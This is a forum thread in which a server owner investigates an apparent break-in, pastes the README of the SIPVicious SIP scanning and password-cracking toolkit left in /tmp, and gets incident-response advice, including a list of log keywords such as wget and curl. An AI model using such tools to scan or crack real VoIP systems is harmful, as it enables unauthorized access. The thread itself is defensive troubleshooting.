Server Hacked

Noticed some issues with services down on my box and started looking through my logs. It appears that the machine has been hacked and I'm still trying to see if it is with a particular site or how they got in. I did find a file named back.txt that was just sitting in the /tmp directory.

cat README
Welcome to SIPVicious security tools.
The 4 tools that you should be looking at are:
- svmap
- svwar
- svcrack
- svreport
The tools:
svmap - this is a sip scanner. When launched against
ranges of ip address space, it will identify any SIP servers
which it finds on the way. Also has the option to scan hosts
on ranges of ports.
svwar - identifies working extension lines on a PBX. A working
extension is one that can be registered.
Also tells you if the extension line requires authentication or not.
svcrack - a password cracker making use of digest authentication.
It is able to crack passwords on both registrar servers and proxy
servers. Current cracking modes are either numeric ranges or
words from dictionary files.
svreport - able to manage sessions created by the rest of the tools
and export to pdf, xml, csv and plain text.
svlearnfp - allows you to generate new fingerprints by simply running
the tool against a host. It will attempt to guess most values and allow
you to save the information to the local fingerprint db. Then you can
choose to upload it to the author so that it can be added to the database.
For usage help make use of -h or --help switch.
Also check out the wiki:
http://code.google.com/p/sipvicious/w/list
And if you're stuck you're welcome to contact the author.
Sandro Gauci
sandrogauc at gmail dot com

Rkhunter isn't finding anything. System is always up-to-date, wordpress is newest version and only running on 1 site with suexec.

grep through your apache logs for words like wget, curl, tar, exec, perl, and so on. They will most likely be using a script vulnerability to download, unpack, and run the files. That should show up what is being exploited. Also manually scroll through the logs at around the time you see that those files were downloaded. That may also give you some hints.

As the files are owned by www-data and rkhunter is not showing any problems, it might be that the hackers did not got root priveliges yet. There had been a few vulnerabilities in phpmyadmin in the last months and your log output shows that they serached for phpmyadmin, so it might be that they went in trough phpmyadmin.

You wrote above that this is a debian 4 system. I recommend that you update it to debian 5. There is a howto from falko available here at howtoforge that describes the debian 4 to 5 update procedure. before you update, remove phpmyadmin wth:

apt-get remove --purge phpmyadmin

and reinstall it after the update with:

apt-get install phpmyadmin. You should also remove all these files in /tmp and then check your server in the next days if you see any anomal behaviours or higher load. You can check your server also with a portscanner from a external other system to see if any ports are opened that you dont wanted to be open.

Things have been ok since deleting all files that were downloaded. I went ahead and did an upgrage from etch to lenny today. The only concern I have is that it doesn't look like the kernel was upgraded.

Code:

uname -r
2.6.18-128.1.1.el5.028stab062.3

Any downside to using an older kernel? Debian version shows as lenny

Code:

cat /etc/debian_version
5.0.6

I'm just a little nervous about trying to upgrade the kernel on a remote system.